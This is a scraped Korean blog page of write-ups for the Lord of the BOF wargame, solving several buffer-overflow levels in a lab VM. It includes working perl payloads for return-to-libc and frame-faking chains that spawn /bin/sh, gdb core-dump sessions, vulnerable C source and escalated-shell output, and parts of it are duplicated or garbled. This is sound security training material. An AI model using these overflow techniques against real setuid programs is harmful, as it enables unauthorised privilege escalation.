LOB20_remotebof_sc_bruteforce.py'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| nightmare -> xavius (0) | 2014.02.20 |
|---|---|
| succubus -> nightmare (0) | 2014.02.20 |
| zombie_assassin -> succubus (0) | 2014.02.20 |
| assassin -> zombie_assassin (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
'Wargame/LOB (Redhat9)'에 해당되는 글 18건
- 2014.02.20 xavius -> death_knight
- 2014.02.20 nightmare -> xavius
- 2014.02.20 succubus -> nightmare
- 2014.02.20 zombie_assassin -> succubus
- 2014.02.20 assassin -> zombie_assassin
- 2014.02.20 giant -> assassin
- 2014.02.20 bugbear -> giant
- 2014.02.20 darkknight -> bugbear
- 2014.02.20 golem -> darkknight
- 2014.02.20 skeleton -> golem
fgets 임시버퍼 공간을 이용했음.ㅋ
id
???????????????멘?@奇拗/bin/sh;pass;P@id
Xshellid
/bin/sh: Xshellid: command not found
id
uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)
pass^H^H^H^H^H^Hmy-pass
/bin/shmy-pass: command not found
my-pass
euid = 519
throw me away
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| xavius -> death_knight (0) | 2014.02.20 |
|---|---|
| succubus -> nightmare (0) | 2014.02.20 |
| zombie_assassin -> succubus (0) | 2014.02.20 |
| assassin -> zombie_assassin (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "aaaa"x3,"\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","\x10\x84\x04\x08"x6,"aaaa","\xa0\xfa\xff\xbf","\x7c\xfa\xff\xbf"'`
aaaaaaaaaaaa?@bbbb廈@??????aaaa????
bash$ my-pass
euid = 518
beg for me
bash$
aaaaaaaaaaaa?@bbbb廈@??????aaaa????
bash$ my-pass
euid = 518
beg for me
bash$
.plt = Procedure Linkable Table
함수들 링크가 가능한 테이블
프로그램이 호출하는 모든 함수가 나열되어 있다.
컴파일 타임에 생성되는 테이블로 어떠한 GOT 영역의 주소를 참조 할지 정해져 있음.
프로그램에서 함수를 호출할 때, 운영체제의 라이브러리에서 호출해오는데 libc의 버전에 따라 호출 형태나 링크 형태가 달라질 수 있기 때문에 그 영향을 받지 않기 위해서 함수의 기계어 코드를 실행 파일이 직접 가질 수 있게 하는 테이블임.
그런데 여기서
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include
#include
#include
#include
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
}
문제 위에 plt라고 되어있던 부분은 plt를 찾아서 공부하란 의미인 것 같고, 실제 문제는 buffer+48부분에 AAAA로 덮는 부분이엇다.
이부분을 strcpy를 이용해 내가 원하는 데이터로 덮어버리면 성공
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| xavius -> death_knight (0) | 2014.02.20 |
|---|---|
| nightmare -> xavius (0) | 2014.02.20 |
| zombie_assassin -> succubus (0) | 2014.02.20 |
| assassin -> zombie_assassin (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| nightmare -> xavius (0) | 2014.02.20 |
|---|---|
| succubus -> nightmare (0) | 2014.02.20 |
| assassin -> zombie_assassin (0) | 2014.02.20 |
| giant -> assassin (0) | 2014.02.20 |
| bugbear -> giant (0) | 2014.02.20 |
Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
Xshell:\>
Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00: "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51: ""
0xbffffb52: ""
0xbffffb53: ""
0xbffffb54: "\003"
0xbffffb56: ""
0xbffffb57: ""
0xbffffb58: "4\200\004\b\004"
0xbffffb5e: ""
0xbffffb5f: ""
0xbffffb60: " "
0xbffffb62: ""
0xbffffb63: ""
0xbffffb64: "\005"
0xbffffb66: ""
0xbffffb67: ""
0xbffffb68: "\006"
0xbffffb6a: ""
0xbffffb6b: ""
0xbffffb6c: "\006"
0xbffffb6e: ""
0xbffffb6f: ""
0xbffffb70: ""
0xbffffb71: "\020"
0xbffffb73: ""
0xbffffb74: "\a"
0xbffffb76: ""
0xbffffb77: ""
0xbffffb78: ""
0xbffffb79: ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a: ""
0xbffffb7b: "@\b"
0xbffffb7e: ""
0xbffffb7f: ""
0xbffffb80: ""
0xbffffb81: ""
0xbffffb82: ""
0xbffffb83: ""
0xbffffb84: "\t"
0xbffffb86: ""
0xbffffb87: ""
0xbffffb88: "\220\203\004\b\013"
0xbffffb8e: ""
0xbffffb8f: ""
0xbffffb90: "\003\002"
0xbffffb93: ""
0xbffffb94: "\f"
0xbffffb96: ""
0xbffffb97: ""
0xbffffb98: "\003\002"
0xbffffb9b: ""
0xbffffb9c: "\r"
0xbffffb9e: ""
0xbffffb9f: ""
0xbffffba0: "\003\002"
0xbffffba3: ""
0xbffffba4: "\016"
0xbffffba6: ""
0xbffffba7: ""
0xbffffba8: "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab: ""
0xbffffbac: "\020"
0xbffffbae: ""
0xbffffbaf: ""
0xbffffbb0: "魂\017\017"
0xbffffbb6: ""
0xbffffbb7: ""
0xbffffbb8: "珹?
0xbffffbbd: ""
0xbffffbbe: ""
0xbffffbbf: ""
0xbffffbc0: ""
0xbffffbc1: ""
0xbffffbc2: ""
0xbffffbc3: ""
0xbffffbc4: ""
0xbffffbc5: ""
0xbffffbc6: ""
0xbffffbc7: ""
0xbffffbc8: ""
0xbffffbc9: ""
0xbffffbca: ""
0xbffffbcb: ""
0xbffffbcc: ""
0xbffffbcd: ""
0xbffffbce: ""
0xbffffbcf: ""
0xbffffbd0: ""
0xbffffbd1: ""
0xbffffbd2: ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3: ""
0xbffffbd4: ""
0xbffffbd5: ""
0xbffffbd6: ""
0xbffffbd7: ""
0xbffffbd8: ""
0xbffffbd9: ""
0xbffffbda: ""
0xbffffbdb: ""
0xbffffbdc: ""
0xbffffbdd: ""
0xbffffbde: ""
0xbffffbdf: ""
0xbffffbe0: "i686"
0xbffffbe5: "./zombie_assassin"
0xbffffbf7: "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24: "PWD=/home/assassin/tmp"
0xbffffc3b: "REMOTEHOST=192.168.232.1"
0xbffffc54: "HOSTNAME=localhost.localdomain"
0xbffffc73: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95: "USER=assassin"
0xbffffca3: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66: "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85: "MAIL=/var/spool/mail/assassin"
0xbffffea3: "INPUTRC=/etc/inputrc"
0xbffffeb8: "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8: "LANG=en_US"
0xbffffee3: "DISPLAY=192.168.232.1:0.0"
0xbffffefd: "LOGNAME=assassin"
0xbfffff0e: "SHLVL=2"
0xbfffff16: "USERNAME="
0xbfffff20: "SHELL=/bin/bash"
0xbfffff30: "HOSTTYPE=i386"
0xbfffff3e: "HISTSIZE=1000"
0xbfffff4c: "OSTYPE=linux-gnu"
0xbfffff5d: "TERM=xterm"
0xbfffff68: "HOME=/home/assassin"
0xbfffff7c: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0: "_=./zombie_assassin"
0xbfffffd4: "OLDPWD=/home/assassin"
0xbfffffea: "./zombie_assassin"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7: 0x6e697373 0x6e69622f 0x2e3d5f00 0x6d6f7a2f
0xbfffffc7: 0x5f656962 0x61737361 0x6e697373 0x444c4f00
0xbfffffd7: 0x3d445750 0x6d6f682f 0x73612f65 0x73736173
0xbfffffe7: 0x2e006e69 0x6d6f7a2f 0x5f656962 0x61737361
0xbffffff7: 0x6e697373 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7: 0x61616161 0x40058ae0 0x62626262 0x400fbff9
0xbffffc07: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc17: 0x62626262 0x62626262 0xbffffbf3 0x44575000
0xbffffc27: 0x6f682f3d 0x612f656d 0x73617373 0x2f6e6973
0xbffffc37: 0x00706d74 0x4f4d4552 0x4f484554 0x313d5453
0xbffffc47: 0x312e3239 0x322e3836 0x312e3233 0x534f4800
0xbffffc57: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffffc67: 0x61636f6c 0x6d6f646c 0x006e6961 0x5353454c
0xbffffc77: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffffc87: 0x70737365 0x2e657069 0x25206873 0x53550073
0xbffffc97: 0x613d5245 0x73617373 0x006e6973 0x435f534c
0xbffffca7: 0x524f4c4f 0x6f6e3d53 0x3a30303d 0x303d6966
0xbffffcb7: 0x69643a30 0x3b31303d 0x6c3a3433 0x31303d6e
0xbffffcc7: 0x3a36333b 0x343d6970 0x33333b30 0x3d6f733a
0xbffffcd7: 0x333b3130 0x64623a35 0x3b30343d 0x303b3333
0xbffffce7: 0x64633a31 0x3b30343d 0x303b3333 0x726f3a31
0xbffffcf7: 0x3b31303d 0x333b3530 0x31343b37 0x3d696d3a
0xbffffd07: 0x303b3130 0x37333b35 0x3a31343b 0x303d7865
0xbffffd17: 0x32333b31 0x632e2a3a 0x303d646d 0x32333b31
0xbffffd27: 0x652e2a3a 0x303d6578 0x32333b31 0x632e2a3a
0xbffffd37: 0x303d6d6f 0x32333b31 0x622e2a3a 0x303d6d74
0xbffffd47: 0x32333b31 0x622e2a3a 0x303d7461 0x32333b31
0xbffffd57: 0x732e2a3a 0x31303d68 0x3a32333b 0x73632e2a
0xbffffd67: 0x31303d68 0x3a32333b 0x61742e2a 0x31303d72
0xbffffd77: 0x3a31333b 0x67742e2a 0x31303d7a 0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by ` aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3: 0x61616161 0x61616161 0x62626262 0x400fbff9
0xbffffc03: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc13: 0x62626262 0x62626262 0xbffffbf3 0x080484df
0xbffffc23: 0x44575000 0x6f682f3d 0x612f656d 0x73617373
0xbffffc33: 0x2f6e6973 0x00706d74 0x4f4d4552 0x4f484554
0xbffffc43: 0x313d5453 0x312e3239 0x322e3836 0x312e3233
0xbffffc53: 0x534f4800 0x4d414e54 0x6f6c3d45 0x686c6163
0xbffffc63: 0x2e74736f 0x61636f6c 0x6d6f646c 0x006e6961
0xbffffc73: 0x5353454c 0x4e45504f 0x752f7c3d 0x622f7273
0xbffffc83: 0x6c2f6e69 0x70737365 0x2e657069 0x25206873
0xbffffc93: 0x53550073 0x613d5245 0x73617373 0x006e6973
0xbffffca3: 0x435f534c 0x524f4c4f 0x6f6e3d53 0x3a30303d
0xbffffcb3: 0x303d6966 0x69643a30 0x3b31303d 0x6c3a3433
0xbffffcc3: 0x31303d6e 0x3a36333b 0x343d6970 0x33333b30
0xbffffcd3: 0x3d6f733a 0x333b3130 0x64623a35 0x3b30343d
0xbffffce3: 0x303b3333 0x64633a31 0x3b30343d 0x303b3333
0xbffffcf3: 0x726f3a31 0x3b31303d 0x333b3530 0x31343b37
0xbffffd03: 0x3d696d3a 0x303b3130 0x37333b35 0x3a31343b
0xbffffd13: 0x303d7865 0x32333b31 0x632e2a3a 0x303d646d
0xbffffd23: 0x32333b31 0x652e2a3a 0x303d6578 0x32333b31
0xbffffd33: 0x632e2a3a 0x303d6d6f 0x32333b31 0x622e2a3a
0xbffffd43: 0x303d6d74 0x32333b31 0x622e2a3a 0x303d7461
0xbffffd53: 0x32333b31 0x732e2a3a 0x31303d68 0x3a32333b
0xbffffd63: 0x73632e2a 0x31303d68 0x3a32333b 0x61742e2a
0xbffffd73: 0x31303d72 0x3a31333b 0x67742e2a 0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3: 0x61616161
(gdb)
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7: 0x61616161
(gdb)
0xbffffbfb: 0x62626262
(gdb)
0xbffffbff: 0x400fbff9
(gdb)
0xbffffc03: 0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.
Type `help' to learn how to use Xshell prompt.
Xshell:\>
Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
_______________________
_______________________------------------- `\
/:--__ |
||< > | ___________________________/
| \__/_________________------------------- |
| |
| The Lord of the BOF : The Fellowship of the BOF, 2010 |
| |
| |
| [enter to the dungeon] |
| gate : gate |
| |
| [RULE] |
| - do not use local root exploit |
| - do not use LD_PRELOAD to my-pass |
| - do not use single boot [h4ck3rsch001] |
| ____________________|_
| ___________________------------------------- `\
|/`--_ |
||[ ]|| ___________________/
\===/___________________--------------------------
login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00: "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51: ""
0xbffffb52: ""
0xbffffb53: ""
0xbffffb54: "\003"
0xbffffb56: ""
0xbffffb57: ""
0xbffffb58: "4\200\004\b\004"
0xbffffb5e: ""
0xbffffb5f: ""
0xbffffb60: " "
0xbffffb62: ""
0xbffffb63: ""
0xbffffb64: "\005"
0xbffffb66: ""
0xbffffb67: ""
0xbffffb68: "\006"
0xbffffb6a: ""
0xbffffb6b: ""
0xbffffb6c: "\006"
0xbffffb6e: ""
0xbffffb6f: ""
0xbffffb70: ""
0xbffffb71: "\020"
0xbffffb73: ""
0xbffffb74: "\a"
0xbffffb76: ""
0xbffffb77: ""
0xbffffb78: ""
0xbffffb79: ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a: ""
0xbffffb7b: "@\b"
0xbffffb7e: ""
0xbffffb7f: ""
0xbffffb80: ""
0xbffffb81: ""
0xbffffb82: ""
0xbffffb83: ""
0xbffffb84: "\t"
0xbffffb86: ""
0xbffffb87: ""
0xbffffb88: "\220\203\004\b\013"
0xbffffb8e: ""
0xbffffb8f: ""
0xbffffb90: "\003\002"
0xbffffb93: ""
0xbffffb94: "\f"
0xbffffb96: ""
0xbffffb97: ""
0xbffffb98: "\003\002"
0xbffffb9b: ""
0xbffffb9c: "\r"
0xbffffb9e: ""
0xbffffb9f: ""
0xbffffba0: "\003\002"
0xbffffba3: ""
0xbffffba4: "\016"
0xbffffba6: ""
0xbffffba7: ""
0xbffffba8: "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab: ""
0xbffffbac: "\020"
0xbffffbae: ""
0xbffffbaf: ""
0xbffffbb0: "魂\017\017"
0xbffffbb6: ""
0xbffffbb7: ""
0xbffffbb8: "珹?
0xbffffbbd: ""
0xbffffbbe: ""
0xbffffbbf: ""
0xbffffbc0: ""
0xbffffbc1: ""
0xbffffbc2: ""
0xbffffbc3: ""
0xbffffbc4: ""
0xbffffbc5: ""
0xbffffbc6: ""
0xbffffbc7: ""
0xbffffbc8: ""
0xbffffbc9: ""
0xbffffbca: ""
0xbffffbcb: ""
0xbffffbcc: ""
0xbffffbcd: ""
0xbffffbce: ""
0xbffffbcf: ""
0xbffffbd0: ""
0xbffffbd1: ""
0xbffffbd2: ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3: ""
0xbffffbd4: ""
0xbffffbd5: ""
0xbffffbd6: ""
0xbffffbd7: ""
0xbffffbd8: ""
0xbffffbd9: ""
0xbffffbda: ""
0xbffffbdb: ""
0xbffffbdc: ""
0xbffffbdd: ""
0xbffffbde: ""
0xbffffbdf: ""
0xbffffbe0: "i686"
0xbffffbe5: "./zombie_assassin"
0xbffffbf7: "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24: "PWD=/home/assassin/tmp"
0xbffffc3b: "REMOTEHOST=192.168.232.1"
0xbffffc54: "HOSTNAME=localhost.localdomain"
0xbffffc73: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95: "USER=assassin"
0xbffffca3: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b: ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33: "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66: "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85: "MAIL=/var/spool/mail/assassin"
0xbffffea3: "INPUTRC=/etc/inputrc"
0xbffffeb8: "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8: "LANG=en_US"
0xbffffee3: "DISPLAY=192.168.232.1:0.0"
0xbffffefd: "LOGNAME=assassin"
0xbfffff0e: "SHLVL=2"
0xbfffff16: "USERNAME="
0xbfffff20: "SHELL=/bin/bash"
0xbfffff30: "HOSTTYPE=i386"
0xbfffff3e: "HISTSIZE=1000"
0xbfffff4c: "OSTYPE=linux-gnu"
0xbfffff5d: "TERM=xterm"
0xbfffff68: "HOME=/home/assassin"
0xbfffff7c: "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0: "_=./zombie_assassin"
0xbfffffd4: "OLDPWD=/home/assassin"
0xbfffffea: "./zombie_assassin"
0xbffffffc: ""
0xbffffffd: ""
0xbffffffe: ""
0xbfffffff: ""
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
0xc0000000: <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7: 0x6e697373 0x6e69622f 0x2e3d5f00 0x6d6f7a2f
0xbfffffc7: 0x5f656962 0x61737361 0x6e697373 0x444c4f00
0xbfffffd7: 0x3d445750 0x6d6f682f 0x73612f65 0x73736173
0xbfffffe7: 0x2e006e69 0x6d6f7a2f 0x5f656962 0x61737361
0xbffffff7: 0x6e697373 0x00000000 Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7: 0x61616161 0x40058ae0 0x62626262 0x400fbff9
0xbffffc07: 0x62626262 0x62626262 0x62626262 0x62626262
0xbffffc17: 0x62626262 0x62626262 0xbffffbf3 0x44575000
0xbffffc27: 0x6f682f3d 0x612f656d 0x73617373 0x2f6e6973
0xbffffc37: 0x00706d74 0x4f4d4552 0x4f484554 0x313d5453
0xbffffc47: 0x312e3239 0x322e3836 0x312e3233 0x534f4800
0xbffffc57: 0x4d414e54 0x6f6c3d45 0x686c6163 0x2e74736f
0xbffffc67: 0x61636f6c 0x6d6f646c 0x006e6961 0x5353454c
0xbffffc77: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffffc87: 0x70737365 0x2e657069 0x25206873 0x53550073
0xbffffc97: 0x613d5245 0x73617373 0x006e6973 0x435f534c
0xbffffca7: 0x524f4c4f 0x6f6e3d53 0x3a30303d 0x303d6966
0xbffffcb7: 0x69643a30 0x3b31303d 0x6c3a3433 0x31303d6e
0xbffffcc7: 0x3a36333b 0x343d6970 0x33333b30 0x3d6f733a
0xbffffcd7: 0x333b3130 0x64623a35 0x3b30343d 0x303b3333
0xbffffce7: 0x64633a31 0x3b30343d 0x303b3333 0x726f3a31
0xbffffcf7: 0x3b31303d 0x333b3530 0x31343b37 0x3d696d3a
0xbffffd07: 0x303b3130 0x37333b35 0x3a31343b 0x303d7865
0xbffffd17: 0x32333b31 0x632e2a3a 0x303d646d 0x32333b31
0xbffffd27: 0x652e2a3a 0x303d6578 0x32333b31 0x632e2a3a
0xbffffd37: 0x303d6d6f 0x32333b31 0x622e2a3a 0x303d6d74
0xbffffd47: 0x32333b31 0x622e2a3a 0x303d7461 0x32333b31
0xbffffd57: 0x732e2a3a 0x31303d68 0x3a32333b 0x73632e2a
0xbffffd67: 0x31303d68 0x3a32333b 0x61742e2a 0x31303d72
0xbffffd77: 0x3a31333b 0x67742e2a 0x31303d7a 0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
